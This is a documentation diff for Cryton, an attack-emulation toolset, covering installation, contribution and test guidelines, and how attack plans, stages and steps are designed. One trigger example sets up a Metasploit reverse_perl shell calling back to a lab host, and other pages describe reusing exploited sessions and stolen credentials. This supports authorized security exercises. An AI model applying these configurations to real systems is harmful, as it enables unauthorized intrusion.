[modules](modules.md#installation) + - Create [permanent settings](#settings-permanent) + - Update the following settings: + 1. CRYTON_WORKER_MODULES_DIR=/absolute/path/to/modules/ + 2. CRYTON_WORKER_EMPIRE_HOST=cryton-empire + +!!! tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - Override the [settings](#settings) + +First, switch to the app directory: +```shell +cd ~/.local/cryton-worker/ +``` + +Install the [modules](modules.md#installation) into the app directory and export the path: +```shell +export CRYTON_WORKER_MODULES_DIR=~/.local/cryton-worker/modules/ +``` +If you're using persistent settings, make sure that they match. + +Download the configuration using: + +=== "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-worker/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +=== "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-worker/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +Run the Compose configuration: +``` +docker compose up -d +``` + +??? question "What should the output look like?" + + ``` + [+] Running 6/6 + ⠿ Network cryton-worker_default Created + ⠿ Container cryton-worker Started + ⠿ Container cryton-empire Started + ``` + +Everything should be set. Check if the installation was successful and the Worker is running: +```shell +docker compose cryton_worker logs +``` +You should see `[*] Waiting for messages.` in the output. + +### With pipx +Cryton Worker is available in the [PyPI](https://pypi.org/project/cryton-worker/){target="_blank"} and can be installed using *pip*. +However, we **highly recommend** installing the app in an isolated environment using [pipx](https://pypa.github.io/pipx/){target="_blank"}. + +!!! danger "Requirements" + + - [Python](https://www.python.org/about/gettingstarted/){target="_blank"} >={{{ python.min }}},<{{{ python.max }}} + - [pipx](https://pypa.github.io/pipx/){target="_blank"} + +!!! tip "Recommendations" + + - Override the [settings](#settings) + - Enable [shell completion](#shell-completion) + +Install the [modules](modules.md#installation) into the app directory and export the path: +```shell +export CRYTON_WORKER_MODULES_DIR=~/.local/cryton-worker/modules/ +``` +If you're using persistent settings, make sure that they match. + +Install the app: + +=== "pipx" + + ```shell + pipx install cryton-worker + ``` + +=== "pip" + + ```shell + pip install --user cryton-worker + ``` + +### With Docker +Cryton Worker is available as a Docker image and can be installed using Docker. + +!!! danger "Requirements" + + - [Docker](https://docs.docker.com/engine/install/){target="_blank"} + +!!! tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - Override the [settings](#settings) + - If you're using persistent settings, switch to the [app directory](#cryton_worker_app_directory) and [pass the settings](#settings-docker) + +Install the [modules](modules.md#installation) into the app directory and export the path: +```shell +export CRYTON_WORKER_MODULES_DIR=~/.local/cryton-worker/modules/ +``` +If you're using persistent settings, make sure that they match. + +Run the container: + +[//]: # (TODO: add a guide to mount the tools?) + +=== "bare version" + + The bare image **doesn't** take care of the modules' system requirements. It should be used on a Kali OS. + + The following command ensures effortless deployment. It mounts the modules and shares the host's networking namespace. + ``` + docker run --network host -e CRYTON_WORKER_MODULES_DIR=${CRYTON_WORKER_MODULES_DIR} -v ${CRYTON_WORKER_MODULES_DIR}:${CRYTON_WORKER_MODULES_DIR} registry.gitlab.ics.muni.cz:443/cryton/cryton-worker:{{{ release_version }}} + ``` + + !!! warning "Limitations" + + - The easiest way to make the container accessible from the outside and to allow the container to access the prerequisites is to use the `--network host` option + - Since the image doesn't contain the tools or the Metasploit Framework, you need to set up and mount them on your own + +=== "kali version" + + The kali image takes care of the modules' system requirements and also hosts the Metasploit Framework. However, the drawback is its large size. + + The following command ensures effortless deployment. It mounts the modules and shares the host's networking namespace. + ``` + docker run --network host -e CRYTON_WORKER_MODULES_DIR=${CRYTON_WORKER_MODULES_DIR} -v ${CRYTON_WORKER_MODULES_DIR}:${CRYTON_WORKER_MODULES_DIR} registry.gitlab.ics.muni.cz:443/cryton/cryton-worker:kali-{{{ release_version }}} + ``` + + !!! warning "Limitations" + + - The easiest way to make the container accessible from the outside and to allow the container to access the prerequisites is to use the `--network host` option + +## Usage +!!! info "" + + If you're using Docker (Compose) to install the app, you can ignore this section. + +Use the following to invoke the app: +```shell +cryton-worker +``` + +You should see a help page: +``` +Usage: cryton-worker [OPTIONS] COMMAND [ARGS]... + + Cryton Worker CLI. + +Options: + ... +``` + +To learn about each command's options use: +```shell +cryton-worker <your command> --help +``` + +To start Worker use `cryton-worker start` and you should see something like: +``` +Starting Worker worker.. +To exit press CTRL+C +Connection does not exist. Retrying.. +Connection to RabbitMQ server established. +[*] Waiting for messages. +``` + +??? question "Want to run the Worker in the background?" + + Use the `nohup` command: + ```shell + nohup cryton-worker start > /tmp/worker_std_out 2>&1 & + ``` + + To **stop** the Worker, find their processes and kill them: + ```shell + ps -aux | grep cryton-worker + kill <PID> <PID> + ``` + +## Shell completion +Shell completion is available for the *Bash*, *Zsh*, and *Fish* shell and has to be manually enabled. + +!!! info "" + + - To enable the shell completion, the tool must be present + - The shell completion is enabled in Docker by default + +First, make sure the app directory exists: + +=== "Bash" + + ```shell + mkdir -p ~/.local/cryton-worker/ + ``` + +=== "Zsh" + + ```shell + mkdir -p ~/.local/cryton-worker/ + ``` + +Generate, save, and load the completion script: + +=== "Bash" + + ```shell + _CRYTON_WORKER_COMPLETE=bash_source cryton-worker > ~/.local/cryton-worker/cryton-worker-complete.bash + echo ". ~/.local/cryton-worker/cryton-worker-complete.bash" >> ~/.bashrc + ``` + +=== "Zsh" + + ```shell + _CRYTON_WORKER_COMPLETE=zsh_source cryton-worker > ~/.local/cryton-worker/cryton-worker-complete.zsh + echo ". ~/.local/cryton-worker/cryton-worker-complete.zsh" >> ~/.zshrc + ``` + +=== "Fish" + + ```shell + _CRYTON_WORKER_COMPLETE=fish_source cryton-worker > ~/.config/fish/completions/cryton-worker-complete.fish + ``` + +You may need to restart your shell for the changes to take effect. diff --git a/docs/contribution-guide.md b/docs/contribution-guide.md index 7a5e606701107042c982af685f2f4d6f1e8fc3be..b47f559216900a4e1710f3b2ac3f62210c5e16b0 100644 --- a/docs/contribution-guide.md +++ b/docs/contribution-guide.md @@ -1,7 +1,105 @@ ## Fixing and reporting bugs -Any identified bugs should be posted as an issue in the respective [gitlab repository](https://gitlab.ics.muni.cz/cryton). +Any identified bugs should be posted as an issue in the respective [gitlab repository](https://gitlab.com/cryton-toolset){target="_blank"}. Please, include as much detail as possible for the developers, to be able to reproduce the erroneous behavior. -## Writing Attack modules -To make attack scenario automation easier we need to create and maintain attack modules. To support project development -checkout section [How to create Attack module](2022.2/modules/howto-create-attack-modules.md). +!!! warning "" + +Before you create an issue, make sure it doesn't exist yet. + +!!! warning "" + +If the issue exists in the [official Gitlab repository](https://gitlab.ics.muni.cz/cryton){target="_blank"}, please mention it in your issue. + +## Contributing code +To support project development check out the development instructions: + +- [Core](development/core.md) +- [Worker](development/worker.md) +- [Modules](development/modules.md) +- [CLI](development/cli.md) +- [Frontend](development/frontend.md) + +## Contribution guidelines + +### Merge requests + +- Every merge request will be named as a summary of changes or as its issue counterpart. For example +`Bugfix "StageExecution won't schedule due to ..."`, `Feature "TicketName"`, `Enhancement "TicketName"`, +`Resolve "MyIssue"`. + +- The merge request's description will contain a list of changes for an easier update of other components or +changelog when creating a new release. If there are some breaking changes, that will render the other components +useless, please describe them in detail, or even better add an example. + +- If the merge request is changing functionality in a way that affects other components, you have to create tickets +(ticket name example: `Update for "MainTicketName"`) for those projects and mark them as blocking for the main MR. +Related merge requests should be merged at the same time (this doesn't apply to the front-end ATM). + +- Before opening a merge request for the Core, Worker, or CLI projects you should run end-to-end tests, which have been +updated for the changes the merge request will do. + +### Tests +This guide simplifies and pinpoints the most important points. + +For in-app testing, we are using unit/integration tests written using the *Pytest* library. + +Unit tests are meant to test a specific method/function in an isolated environment (using mocking) while +the integration tests check if a unit (method/function) can run even without being isolated. End-to-end tests are +testing if all the functionality works across the whole Cryton toolset. + +- Settings for Pytest can be found in a *pyproject.toml* file +- Tests (that test the same code part/class) are grouped using classes +- Each class that works with the Django DB has to be marked with `@pytest.mark.django_db` +- Each class should be patched to use the test logger if possible ([Core](logging.md#core); [worker](logging.md#worker)) +- Unit tests shouldn't interact with the DB. +- Use the `model_bakery` library instead of mocking the DB interactions for the integration tests +- For easier mocking, each test class should have a `path` class variable. If we are testing a class +in `path/to/module.py`, then the *path* variable will be `path = "path.to.module"`. To mock we simply use +`mocker.patch(self.path + ".<method_to_mock>")`. +- We are using the *mocker* library instead of the *unittest.mock.Mock*. +- Each test method starts with the `test_` prefix. +- Each fixture method starts with the `f_` prefix. +- When using parametrize, the created parameters must have the `p_` prefix. + +A test should follow the following structure. +```python +import pytest + +class TestUnitName: + path = "path.to.patch.MyClass" + + @pytest.fixture + def f_to_patch(self, mocker): + return mocker.patch(f"{self.path}.to_patch") + + @pytest.mark.parametrize( + "p_to_parametrize", + [ + ] + ) + def test_to_test(self, f_to_patch, p_to_parametrize): + # Arrange - set everything needed for the test + + # Mock - mock everything needed to isolate your test + + # Act - trigger your code unit + + # Assert - assert the outcome is exactly as expected to avoid any unpleasant surprises later + pass +``` + +## Documentation + +### CLI documentation generation +Install Cryton CLI and run `cryton-cli generate-docs doc.md` + +### Core REST API documentation generation + +- Install the [swagger-markdown tool](https://www.npmjs.com/package/swagger-markdown){target="_blank"} +- Download the schema from [http://127.0.0.1:8000/api/schema/](http://127.0.0.1:8000/api/schema/){target="_blank"} +- Run `swagger-markdown -i path/to/swagger-schema.yml`. + +### Useful links + +- [MkDocs Wiki](https://github.com/mkdocs/mkdocs/wiki){target="_blank"} (Third-party themes, recipes, plugins and more) +- [Best-of-MkDocs](https://github.com/pawamoy/best-of-mkdocs){target="_blank"} (Curated list of themes, plugins and more) diff --git a/docs/2022.2/designing-phase/plan-instance.md b/docs/designing-phase/plan-instance.md similarity index 72% rename from docs/2022.2/designing-phase/plan-instance.md rename to docs/designing-phase/plan-instance.md index e816c9b68f048d8a77457dc7a3cabddf6f52833b..d1925449fae30098e23ca501b9b8dd4d6bf5d5f1 100644 --- a/docs/2022.2/designing-phase/plan-instance.md +++ b/docs/designing-phase/plan-instance.md @@ -2,25 +2,26 @@ The second stage is creating a Plan instance. While Template contains unfilled v Plan instance fills these things in by combining the template with an **inventory file**. This file contains all information that needs to be filled in the template. After instantiation, everything is ready to create a **Run**. -**NOTE: After creating the Plan instance only the [Execution variables](step.md#execution-variables) can be left -unfilled and must be explicitly defined as a string.** +!!! warning + + After creating the Plan instance only the [Execution variables](step.md#execution-variables) can be left unfilled and must be explicitly defined as a string. ## Inventory files When you create a template, you don't always have all the information you need for directly executing it. Or you -simply want to make it reusable for other people in their own environment. To provide variability in +simply want to make it reusable for other people in their environment. To provide variability in templates we support **inventory files**. These inventory files can be used to provide variable values to templates using **Jinja** language. A valid Plan file is written in YAML format with variables in the Jinja format, which have to be replaced during the instantiation process. -Example of inventory file: +Inventory file example: ```yaml names: stage1_target: 192.168.56.102 ``` -You can use it as in following example: +Template example: ```yaml # Stage two: target is web server - target: {{names.stage1_target}} diff --git a/docs/2022.2/designing-phase/plan.md b/docs/designing-phase/plan.md similarity index 74% rename from docs/2022.2/designing-phase/plan.md rename to docs/designing-phase/plan.md index c36636752fbe47633ea23872fb9301e6cae677e3..1b6a8322d903734fe94ec08b61179b83d1ee0a79 100644 --- a/docs/2022.2/designing-phase/plan.md +++ b/docs/designing-phase/plan.md @@ -7,6 +7,8 @@ Example of defining a Plan using YAML: plan: name: my-plan owner: my name + settings: + separator: "|" stages: ... @@ -17,3 +19,4 @@ To better understand what each argument means and defines, here is a short descr - **name** - Sets the name of the Plan. - **owner** - Name of the person who created the Plan. - **stages** - List of [Stages](stage.md) that will be executed during the Plan's execution. +- **settings** - Parameters for customization of specific functionalities (only `separator` for now, more about `separator` [here](step.md#custom-separator)) diff --git a/docs/2022.2/designing-phase/stage.md b/docs/designing-phase/stage.md similarity index 79% rename from docs/2022.2/designing-phase/stage.md rename to docs/designing-phase/stage.md index 522d7e067059183db150e9fd6130d004d65da2a4..d9e6fea3258aa9aa6dbe8ed65daec29b3f4dd3df 100644 --- a/docs/2022.2/designing-phase/stage.md +++ b/docs/designing-phase/stage.md @@ -46,15 +46,15 @@ Schedule execution for a specific date and time after the plan started. **Notice:** One argument from the Date and Time part of arguments (every argument except `timezone`) is required. Besides that, arguments are optional and their default values are used in their absence. -| Argument | Description | Default | -|----------|----------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------| -| timezone | Timezone for DateTime trigger. List of available timezones [here](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones). | UTC | -| year | Year in which stage should be executed. | The year of the plan execution in the specified timezone | -| month | Month in which stage should be executed. | The month of the plan execution in the specified timezone | -| day | Day in which stage should be executed. | The day of the plan execution in the specified timezone | -| hour | Hour in which stage should be executed. | 00 | -| minute | Minute in which stage should be executed. | 00 | -| second | Second in which stage should be executed. | 00 | +| Argument | Description | Default | +|----------|---------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------| +| timezone | Timezone for DateTime trigger. List of available timezones [here](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones){target="_blank"}. | UTC | +| year | Year in which stage should be executed. | The year of the plan execution in the specified timezone | +| month | Month in which stage should be executed. | The month of the plan execution in the specified timezone | +| day | Day in which stage should be executed. | The day of the plan execution in the specified timezone | +| hour | Hour in which stage should be executed. | 00 | +| minute | Minute in which stage should be executed. | 00 | +| second | Second in which stage should be executed. | 00 | #### Examples @@ -86,7 +86,7 @@ trigger_type: HTTPListener trigger_args: host: localhost # Address of the listener from the Worker's perspective. port: 8082 # Port of the listener from the Worker's perspective. - routes: # List of routes listener will check for requests. + routes: # List of routes the listener will check for requests. - path: /index # Request's path. method: GET # Request's allowed method. parameters: # Request's required parameters. @@ -98,11 +98,11 @@ trigger_args: The stage will be executed when a session with the user-defined arguments is returned from Worker. Once the session is saved, it can be accessed using `use_named_session: my-stage-name_session`, where `my-stage-name` is the Stage's name. -Identifiers are arguments that can be used to identify a msf session that we are waiting for to trigger the Stage. Arguments in identifiers use partial 'regex' to get matches. For example, they can use 'handler' to match 'exploit/multi/handler'. +Identifiers are arguments that can be used to identify an MSF session that we are waiting for to trigger the Stage. Arguments in identifiers use partial 'regex' to get matches. For example, they can use 'handler' to match 'exploit/multi/handler'. ```yaml trigger_type: MSFListener trigger_args: - identifiers: # Optional, by default MsfTrigger will try to find a match using 'via_exploit' and 'via_payload' based on used msf module and payload + identifiers: # Optional, by default MsfTrigger will try to find a match using 'via_exploit' and 'via_payload' based on the used MSF module and payload type: 'shell' tunnel_local: '192.168.56.50:4444' tunnel_peer: '192.168.56.51:35380' @@ -124,7 +124,7 @@ trigger_args: RHOST: 192.168.56.51 RPORT: 6697 payload: cmd/unix/reverse_perl # Payload to use. - payload_arguments: # Arguments that will be passed to payload. + payload_arguments: # Arguments that will be passed to the payload. LHOST: 192.168.56.50 LPORT: 4444 @@ -133,7 +133,7 @@ trigger_args: [//]: # (add auxiliary example after Trigger rework) ## Dependencies -Creating time based triggers can be limiting, since the Stage itself can take more time than expected. To ensure that +Creating time-based triggers can be limiting, since the Stage itself can take more time than expected. To ensure that the Stages will execute in the correct order, you can choose to check if some other Stage has already finished, before its execution. All you have to do is define the `depends_on` argument. diff --git a/docs/2022.2/designing-phase/step.md b/docs/designing-phase/step.md similarity index 68% rename from docs/2022.2/designing-phase/step.md rename to docs/designing-phase/step.md index 34acc91637b838391843228f4c965f209ead682e..87c9b9cac2fd837863ef3fca34deea2e9254c8a9 100644 --- a/docs/2022.2/designing-phase/step.md +++ b/docs/designing-phase/step.md @@ -1,5 +1,5 @@ As the name suggests, a Step is equal to one action. All the possible actions will be described later. -Every step can have a successor(s) which execution will follow according to provided conditions. +Every step can have a successor(s) whose execution will follow according to provided conditions. Example of defining Step using YAML: ```yaml @@ -21,7 +21,7 @@ next: ``` To better understand what each argument means and defines, here is a short description (sub-arguments are omitted -since they will be discussed in more depth in their own section): +since they will be discussed in more depth in their section): - **name** - Sets the name of the Step, which is mainly used to define its purpose (**must be unique** across the Plan). - **step_type** - Sets what action will the Step perform and what `arguments` will the Step use, more info [below](#step-types). @@ -53,7 +53,7 @@ This functionality uses `step_type: worker/execute` and enables the execution of | `module_arguments` | Python dictionary (JSON) containing arguments that will be passed to the module. | | `create_named_session`<br>(optional) | How to name the session this module will create for later usage. | | `use_named_session`<br>(optional) | Name of created msf session through Cryton. | -| `use_any_session_to_target`<br>(optional) | Ip address of target on which has been created msf session. | +| `use_any_session_to_target`<br>(optional) | Ip address of target on which has been created MSF session. | | `session_id`<br>(optional) | ID of msf session to target. | | [`ssh_connection`](#arguments-for-ssh_connection)<br>(optional) | Arguments for creating ssh connection to target. | @@ -71,28 +71,23 @@ This functionality uses `step_type: worker/execute` and enables the execution of ## Conditional execution To be able to execute an attack scenario according to some execution tree, Steps provide a way to be executed -according to specified conditions. There are many types of conditions that can be used. To use them in designing a -Template, a list of dictionaries **containing** params **type**, **value**, **step** must be provided. +according to specified conditions. Multiple types of conditions can be used. To use them in designing a +Template, a list of dictionaries **containing** params **type**, **value**, and **step** must be provided. -Following are types of conditions together with descriptions of possible values. +| parameter | Description | +|-----------|--------------------------------------------------------------------------------------------------------------------------------| +| **type** | Defines which value you want to compare, according to the output of the parent Step. | +| **value** | Defines the desired value of the selected type. Can be defined as a string (one value) or a list of strings (multiple values). | +| **step** | Defines the name(s) of the Step's successor(s). Can be a string (one successor) or a list of strings (multiple successors). | -| Type | Value | Description | -|---------------------|---------------------------------------------------------|------------------------------------------------------------| -| `result` | OK, FAIL, EXCEPTION | Match final `result` of the Step. | -| `serialized_output` | Regex expression, for example: `^my_regex_expression.*` | Match regex expression in `serialized_output` of the Step. | -| `output` | Regex expression, for example: `^my_regex_expression.*` | Match regex expression in `output` of the Step. | -| `any` | - (value must be omitted) | Run successor(s) in any case. | +The following are types of conditions together with descriptions of possible values. - -### type -Which value you want to compare, according to the output of the parent Step. - -### value -The desired value of the selected type. Can be defined as a string (one value) or a list of strings (multiple values). - -### step -Name of the Step's successor(s). -Can be a string (one successor) or a list of strings (multiple successors). +| Type | Value | Description | +|---------------------|------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------| +| `result` | OK, FAIL, EXCEPTION | Match final `result` of the Step. | +| `serialized_output` | Regular expression, for example: `^my_regex.*` | Match [regex](https://docs.python.org/3/library/re.html#regular-expression-syntax){target="_blank"} in `serialized_output` of the Step. | +| `output` | Regular expression, for example: `^my_regex.*` | Match [regex](https://docs.python.org/3/library/re.html#regular-expression-syntax){target="_blank"} in `output` of the Step. | +| `any` | Value must be omitted | Run successor(s) in any case. | ### Examples: ```yaml @@ -119,11 +114,41 @@ next: - step-to-execute-2 ``` +## Session management +One of the unique features of Cryton is the ability to create and use *sessions* - connections to the target systems. +When you successfully exploit a running network service on your target machine (victim), you open a connection to it. +In Cryton, this connection can be given a name and then used during the Plan execution in any Step (which is executed +on the same Worker node and supports this functionality). Metasploit Framework session management is used for storing +and interacting with sessions, and therefore must be available and running on the Worker node. + +```yaml +- name: step1 + arguments: + create_named_session: session_to_target_1 + ... +- name: step2 + arguments: + use_named_session: session_to_target_1 + ... +``` + +In the example above, the step1 creates a named session *session_to_target_1* (in case it succeeds). +Its Metasploit ID gets stored in the database and can be used anywhere in the Plan, not only in the following Step +(as seen in the example). When the Plan creates multiple sessions to the same target, and the attacker does not care which +he is using, the *use_any_session_to_target* parameter can be used. + +```yaml +- name: step1 + arguments: + use_any_session_to_target: 192.168.56.22 + ... +``` + ## Output sharing Output sharing is used for sharing gained data (*serialized_output*) between multiple steps. To go through the data we use a modified version of a dot notation. -For example imagine following dictionary (Python data structure) +For example, imagine the following dictionary (Python data structure) ```json {"credentials": [{"username": "admin", "password": "securePassword"}]} ``` @@ -132,12 +157,12 @@ If we wanted to access it and get **password** for *admin* user using our versio This brings in some limitations: -- keys are separated using `.` +- keys are separated using `.` (More on how to choose a custom separator [here](#custom-separator). - key can't be in format `[integer]` (regex representation: `^\[[0-9]+]$`) as it represents list (array) index -- list (array) index can be defined multiple times in the same key for example `myKey[1][1]`, however must be defined at its end +- list (array) index can be defined multiple times in the same key for example `myKey[1][1]` (it must be defined at its end) (regex representation: `((\[[0-9]+])+$)`) -There are two techniques for sharing outputs of modules between steps: +There are two techniques for sharing the outputs of modules between steps: * **output_prefix** * **output_mapping** @@ -174,7 +199,7 @@ For example: username: $custom_prefix.username password: $custom_prefix.password ``` -Also, there is a special prefix named **parent**, which simply takes the output from parent step execution +Also, there is a special prefix named **parent**, which simply takes the output from the parent step execution (which executed the current step). ```yaml @@ -186,18 +211,48 @@ Also, there is a special prefix named **parent**, which simply takes the output step: stepB - name: stepB ... - module_arguments: - username: $parent.var + arguments: + module_name: mod_a + module_arguments: + username: $parent.var ``` -Output prefix **cannot be the name of other steps or the value "parent"**, otherwise it can be +Output prefix **cannot be the name of other steps or the value "parent"**, otherwise, it can be any string **that doesn't contain "$" and "." signs**. +### Custom separator +If for some reason(for example when a key in the module's output is an IPv4 address) you don't want to use `.` as a separator in output-sharing variables, you can use the `settings` parameter in the Plan parameters with a `separator` key for defining custom separator. + +Example of a custom separator used on **parent prefix** example above: +```yaml +plan: + name: my-plan + owner: my name + settings: + separator: "|" + stages: + - name: my-stage + ... + steps: + - name: stepA + ... + next: + - type: ... + value: ... + step: stepB + - name: stepB + ... + arguments: + module: mod_a + module_arguments: + username: $parent|arg +``` + ### Output mapping Sometimes you do not care from which module you receive information. Step A and Step B can both return a stolen authentication token. For this reason, you can use ```output_prefix```. But there is an obvious problem! What if both steps return this value under a different name, e.g. ```token``` and ```auth_token```? Prefix would not help you much in this situation. -For this reason there is a ```output_mapping``` mechanism. +For this reason, there is a ```output_mapping``` mechanism. ```yaml - name: step_a # Returns 'token' @@ -272,4 +327,4 @@ For `empire/agent-deploy` or `empire/execute` you can use these variables for th * If you want to use more Jinja goodies, use the raw block: ```yaml foo: {% raw %} '{{ variable + 14 }}' {% endraw %} - ``` \ No newline at end of file + ``` diff --git a/docs/designing-phase/template.md b/docs/designing-phase/template.md new file mode 100644 index 0000000000000000000000000000000000000000..38893591467a2ee4857c196be8f1deac29aa3448 --- /dev/null +++ b/docs/designing-phase/template.md @@ -0,0 +1,37 @@ +## What is the attack scenario +Let's start with the description of the attack scenario. Scenario and Plan can be used interchangeably - [Plan](plan.md) is just +the name of the element in the formal description of the attack scenario. + +An attack scenario is a sequence of steps with some common objective. This objective may be data ex-filtration, access to +target systems, denial of service, or any other harmful action. For some exercises, every attack should be +divisible into different [stages](stage.md). Imagine you have to attack infrastructure with multiple machines - each machine can +be a separate stage. Or you want to attack according to some kill-chain, e.g. the first stage would be scanning of the +infrastructure, the second is brute force attack on credentials to found systems, etc. + +The last and most important element of the Plan description is the [step](step.md). This is the execution of an attack script or tool +against the target. A step can be running a Metasploit exploit, or running a Nmap scan. Steps are dependent on each other, +and so they create an execution tree, where each of them has set the list of successors based on some condition. The +condition may be a success or a string value returned by its predecessor. + +Putting this all together you get the whole attack scenario (called **[Plan](plan.md)**), which is divided into different stages +(called **[Stage](stage.md)**). Every stage is set to run at a specific time, as this is often required by the exercise. And finally, each +stage consists of attack steps (called **[Step](step.md)**), which are organized in a non-binary tree described above. + +## What is the plan template +The first step in designing a Plan (attack scenario) is creating a plan template. A template is basically a Plan object written in YAML. + + + +The template itself is not a fully described attack scenario. The structure of the Attack (execution tree) is correct, +but there are still unfilled places (e.g. IP addresses of targets or other [inventory variables](plan-instance.md#inventory-files)). +This way a template can be designed before knowing these details and used in multiple different environments. + +An abstract Plan can look like this: +```yaml +Plan + Stage 1 + Step 1 + Step 2 + Stage 2 + Step 3 +``` diff --git a/docs/development/cli.md b/docs/development/cli.md new file mode 100644 index 0000000000000000000000000000000000000000..9e5be7168560906c4c6a5413dd465be1aaf60d5f --- /dev/null +++ b/docs/development/cli.md @@ -0,0 +1,71 @@ +## Settings +The best thing you can do is to change the app directory to `path/to/cryton-cli/`. That way, you can edit the default .env file +and use it for the compose files. +```shell +export CRYTON_CLI_APP_DIRECTORY=path/to/cryton-cli/ +``` + +[Link to the settings](../components/cli.md#settings). + +## Installation + +!!! danger "Requirements" + + - [Python](https://www.python.org/about/gettingstarted/){target="_blank"} >={{{ python.min }}},<{{{ python.max }}} + - [Poetry](https://python-poetry.org/docs/#installation){target="_blank"} + +!!! tip "Recommendations" + + - Override the [settings](#settings) + +Clone the repository: +```shell +git clone https://gitlab.ics.muni.cz/cryton/cryton-cli.git +``` + +Then go to the correct directory and install the project: +```shell +cd cryton-cli +poetry install +``` + +To spawn a shell use: +```shell +poetry shell +``` + +## Usage +```shell +cryton-cli +``` + +[Link to the usage](../components/cli.md#usage). + + +## Testing + +### Pytest +``` +pytest --cov=cryton_cli tests/unit_tests --cov-config=.coveragerc-unit --cov-report html +``` + +``` +pytest --cov=cryton_cli tests/integration_tests --cov-config=.coveragerc-integration --cov-report html +``` + +???+ "Run specific test" + + ``` + my_test_file.py::MyTestClass::my_test + ``` + +### tox +Use in combination with [pyenv](https://github.com/pyenv/pyenv){target="_blank"}. + +```shell +tox -- tests/unit_tests/ --cov=cryton_cli --cov-config=.coveragerc-unit +``` + +```shell +tox -- tests/integration_tests/ --cov=cryton_cli --cov-config=.coveragerc-integration +``` diff --git a/docs/development/core.md b/docs/development/core.md new file mode 100644 index 0000000000000000000000000000000000000000..2e1401bbcbb33f89a5ec39e85b2e988650dad2ba --- /dev/null +++ b/docs/development/core.md @@ -0,0 +1,107 @@ +## Settings +The best thing you can do is to change the app directory to `path/to/cryton-core/`. That way, you can edit the default .env file +and use it for the compose files. +```shell +export CRYTON_CORE_APP_DIRECTORY=path/to/cryton-core/ +``` + +[Link to the settings](../components/core.md#settings). + +## Installation + +!!! danger "Requirements" + + - [Python](https://www.python.org/about/gettingstarted/){target="_blank"} >={{{ python.min }}},<{{{ python.max }}} + - [Poetry](https://python-poetry.org/docs/#installation){target="_blank"} + +!!! tip "Recommendations" + + - Override the [settings](#settings) + +Clone the repository: +```shell +git clone https://gitlab.ics.muni.cz/cryton/cryton-core.git +``` + +Start the prerequisites: +```shell +docker compose -f docker-compose.prerequisites.yml up -d +``` + +??? tip "Clean up and rebuild the prerequisites" + + !!! warning + + The following script removes unused images and volumes. Make sure you know what you're doing! + + ``` + docker compose -f docker-compose.prerequisites.yml down -t 0 && docker system prune --volumes -f && docker compose -f docker-compose.prerequisites.yml up -d + ``` + +Then go to the correct directory and install the project: +```shell +cd cryton-core +poetry install +``` + +To spawn a shell use: +```shell +poetry shell +``` + +## Usage +```shell +cryton-core start +``` + +[Link to the usage](../components/core.md#usage). + +## Testing + +### Pytest +``` +pytest --cov=cryton_core tests/unit_tests --cov-config=.coveragerc-unit --cov-report html +``` + +``` +pytest --cov=cryton_core tests/integration_tests --cov-config=.coveragerc-integration --cov-report html +``` + +???+ "Run specific test" + + ``` + my_test_file.py::MyTestClass::my_test + ``` + +### tox +Use in combination with [pyenv](https://github.com/pyenv/pyenv){target="_blank"}. + +```shell +tox -- tests/unit_tests/ --cov=cryton_core --cov-config=.coveragerc-unit +``` + +```shell +tox -- tests/integration_tests/ --cov=cryton_core --cov-config=.coveragerc-integration +``` + +## django setup for testing scripts + +``` +import os +os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cryton_core.settings") +import django +django.setup() +``` + +## Django migrations + +### Apply migrations +``` +cryton-core migrate +``` + +### Init migrations +Migrations in `cryton_core/cryton_app/migrations/` must be empty +``` +cryton-core makemigrations cryton_app +``` diff --git a/docs/development/frontend.md b/docs/development/frontend.md new file mode 100644 index 0000000000000000000000000000000000000000..259181bce8f141ed23a1b6f2475c5ada2b6b2ec5 --- /dev/null +++ b/docs/development/frontend.md @@ -0,0 +1,24 @@ +## Installation + +!!! danger "Requirements" + + - [npm](https://nodejs.org/en/){target="_blank"} + +Install dependencies: +```shell +npm install +``` + +## Usage +Start a development server: +```shell +npm start +``` + +The app will refresh itself when the project changes. + +!!! note "We use Husky to run pre-commit hooks" + + - Code formatting with Prettier. + - Linting with ESLint. + - Running unit tests with Karma. diff --git a/docs/development/modules.md b/docs/development/modules.md new file mode 100644 index 0000000000000000000000000000000000000000..0f81499532d3655eceb438147e59987055893dea --- /dev/null +++ b/docs/development/modules.md @@ -0,0 +1,239 @@ +Modules are hot-swappable, which means the modules don't have to be present at startup. +This is especially useful for development but **not recommended for production**. + +## Input parameters +Every module has its input parameters. These input parameters are given by the Worker as a dictionary to the +module `execute` (when executing the module) or `validate` (when validating the module parameters) function. + +## Output parameters +Every attack module (its `execute` function) returns a dictionary to the Worker with the following keys: + +| Parameter name | Parameter meaning | +|---------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `return_code` | Numeric representation of result (0, -1, -2). <br />0 (OK) means the module finished successfully.<br />-1 (FAIL) means the module finished unsuccessfully.<br />-2 (ERROR) means the module finished with an unhandled error. | +| `serialized_output` | Parsed output of the module. Eg. for a brute force module, this might be a list of found usernames and passwords. | | +| `output` | Raw output of the module | + + +## How to create attack modules +In this section, we will discuss best practices and some rules that each module must follow. + +To be able to execute a module using the Worker, it must have the following structure and IO arguments. + +- Each module must have its directory with its name. +- The main module script must be called `mod.py`. +- Module must contain an `execute` function that takes a dictionary and returns a dictionary. It's an entry point for executing it. +- Module should contain a `validate` function that takes a dictionary, validates it, and returns 0 if it's okay, else raises an exception. + +Path example: +`/CRYTON_WORKER_MODULES_DIR/my-module-name/mod.py` + +Where: + +- **CRYTON_WORKER_MODULES_DIR** has to be the same path as is defined in the *CRYTON_WORKER_MODULES_DIR* variable. +- **my-module-name** is the directory containing your module. +- **mod.py** is the module file. + +Here's an example of a typical module directory: +``` +my_module_name/ +├── mod.py +├── test_mod.py +├── README.md +├── requirements.txt +└── example.py +``` + +### mod.py +The most important file is the module itself 